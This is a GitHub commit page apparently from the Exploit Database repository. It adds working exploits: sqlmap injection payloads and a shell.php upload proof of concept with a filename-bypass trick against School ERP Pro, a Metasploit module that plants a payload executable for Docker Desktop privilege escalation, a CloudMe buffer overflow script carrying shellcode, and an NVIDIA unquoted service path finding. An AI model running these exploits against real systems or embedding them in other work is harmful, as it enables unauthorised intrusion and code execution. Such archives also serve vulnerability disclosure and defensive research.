Skip to content

Commit

Permalink
DB: 2020-04-29
Browse files Browse the repository at this point in the history 
8 changes to exploits/shellcodes

Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)
NVIDIA Update Service Daemon 1.0.21  - 'nvUpdatusService' Unquoted Service Path

CloudMe 1.11.2 - Buffer Overflow (PoC)
School ERP Pro 1.0 - 'es_messagesid' SQL Injection
School ERP Pro 1.0 - Remote Code Execution
  • Loading branch information
Offensive Security committed Apr 29, 2020
1 parent b1e1bfd commit 0f5a9de
Show file tree
Hide file tree
Showing 7 changed files with 346 additions and 2 deletions.
2 changes: 1 addition & 1 deletion exploits/windows/local/48387.txt → exploits/macos/local/48387.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@
# Vendor Homepage: https://www.valvesoftware.com/en/
# Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
# Tested on: MacOS 15.3
# CVE : N/A
# CVE : CVE-2020-12242

import os, random, sys
banner = """
Expand Down
44 changes: 44 additions & 0 deletions exploits/php/webapps/48390.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT

SQL Injection Detail
--------------------------------
*# Vulnerable parameter: es_messagesid*
*# Vulnerable code:*

if($action=="fullmessage_sent"){
$msg_qry ="SELECT * FROM es_messages WHERE
from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and
es_messagesid=".*$es_messagesid;*
$details_message=$db->getrow($msg_qry);
}
?>

*Here is the SQLmap output:*
*----------------------------------------*

GET parameter '*es_messagesid*' is vulnerable.
sqlmap identified the following injection point(s):
---
Parameter: es_messagesid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT
6369=6369

Type: UNION query
Title: Generic UNION query (random number) - 12 columns
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL
SELECT
6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194--
-
---
[01:09:41] [INFO] testing MySQL
[01:09:42] [INFO] confirming MySQL
[01:09:44] [INFO] the back-end DBMS is MySQL
103 changes: 103 additions & 0 deletions exploits/php/webapps/48392.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,103 @@
# Exploit Title: School ERP Pro 1.0 - Remote Code Execution
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT

Description
-------------------------------------------
A student can send a message to the admin. Additionally, with this method,
the student can upload a PHP file to the system and run code in the system.

------------------------------------
*Vulnerable code - 1: (for student area) - sendmail.inc.php*
- Student user can send message to admin with the attachment
------------------------------------
$image_file = basename($_FILES['newimage']['name'][$i]);
$ext=explode(".",$_FILES['newimage']['name'][$i]);
$str=date("mdY_hms");
//$t=rand(1, 15);
$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];
$updir = "images/messagedoc/";
$dest_path = $updir.$new_thumbname;
$up_images[$i] = $dest_path;
$srcfile = $_FILES['newimage']['tmp_name'][$i];
@move_uploaded_file($srcfile, $dest_path);
$ins_arr_prod_images = array(
'`es_messagesid`' => $id,
'`message_doc`' => $new_thumbname
);
$idss=$db->insert("es_message_documents",$ins_arr_prod_images);

---------------------------------------------------
*PoC of the Remote Code Execution*
---------------------------------------------------

POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin
Content-Type: multipart/form-data;
boundary=---------------------------2104557667975595321153031663
Content-Length: 718
DNT: 1
Connection: close
Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c
Upgrade-Insecure-Requests: 1

-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="subject"

DEDED
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="message"

<p>DEDED</p>
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="newimage[]"; filename="shell.php"
Content-Type: text/php

<?php phpinfo(); ?>

-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="filecount[]"

1
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="submit_staff"

Send
-----------------------------2104557667975595321153031663--


------------------------------------
*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*
- Admin user can update user profile photo
------------------------------------
if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {
$ext = explode(".",$_FILES['pre_image']['name']);
$str = date("mdY_hms");
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
$updir = "images/student_photos/";
$uppath = $updir.$new_thumbname;
move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);
$file = $new_thumbname;

------------------------------------
Bypass Technique:
------------------------------------

$_FILES['pre_image']['name']; --- > shell.php.png
$ext = explode(".",$_FILES['pre_image']['name']);
---
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
$ext[0] --> shell
$ext[1] --> php
lastfilename --> st_date_shell.php
108 changes: 108 additions & 0 deletions exploits/windows/local/48388.rb
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,108 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Post::Windows::Priv
include Post::Windows::Runas

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',
'Description' => %q{
This exploit leverages a vulnerability in docker desktop
community editions prior to 2.1.0.1 where an attacker can write
a payload to a lower-privileged area to be executed
automatically by the docker user at login.
},
'License' => MSF_LICENSE,
'Author' => [
'Morgan Roman', # discovery
'bwatters-r7', # metasploit module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [[ 'Automatic', {} ]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'WfsDelay' => 15
},
'DisclosureDate' => '2019-07-05',
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'References' => [
['CVE', '2019-15752'],
['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
]
)
)
register_options(
[OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]
)
end

def docker_version
output = cmd_exec('cmd.exe', '/c docker -v')
vprint_status(output)
version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0]
Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))
end

def check
if docker_version <= Gem::Version.new('18.09.0')
return CheckCode::Appears
end

CheckCode::Safe
end

def exploit
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end

# make payload
docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin")
fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)
payload_name = 'docker-credential-wincred.exe'
payload_pathname = "#{docker_path}\\#{payload_name}"
vprint_status('Making Payload')
payload = generate_payload_exe

# upload Payload
vprint_status("Uploading Payload to #{payload_pathname}")
write_file(payload_pathname, payload)
vprint_status('Payload Upload Complete')
print_status('Waiting for user to attempt to login')
end

def check_permissions!
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
# is_in_admin_group can be nil, true, or false
end
end
36 changes: 36 additions & 0 deletions exploits/windows/local/48391.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
# Exploit Title: NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-04-27
# Vendor Homepage: https://www.nvidia.com/es-la/
# Software Link : https://www.nvidia.com/es-la/
# Tested Version: 1.0.21
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:


C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v """
NVIDIA Update Service Daemon nvUpdatusService C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe Auto

C:\>sc qc nvUpdatusService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: nvUpdatusService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START (DELAYED)
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : NVIDIA Update Service Daemon
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: .\UpdatusUser

C:\>

#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
48 changes: 48 additions & 0 deletions exploits/windows/remote/48389.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
7 changes: 6 additions & 1 deletion files_exploits.csv
View file
Original file line number Diff line number Diff line change
Expand Up @@ -11039,7 +11039,9 @@ id,file,description,date,author,type,platform,port
48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
48387,exploits/windows/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,windows,
48387,exploits/macos/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,macos,
48388,exploits/windows/local/48388.rb,"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)",2020-04-28,Metasploit,local,windows,
48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
Expand Down Expand Up @@ -18113,6 +18115,7 @@ id,file,description,date,author,type,platform,port
48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
Expand Down Expand Up @@ -42622,3 +42625,5 @@ id,file,description,date,author,type,platform,port
48384,exploits/hardware/webapps/48384.txt,"Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak",2020-04-27,Besim,webapps,hardware,
48385,exploits/php/webapps/48385.txt,"Online Course Registration 2.0 - Authentication Bypass",2020-04-27,"Daniel Monzón",webapps,php,
48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php,
48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php,
48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php,

0 comments on commit 0f5a9de

Please sign in to comment.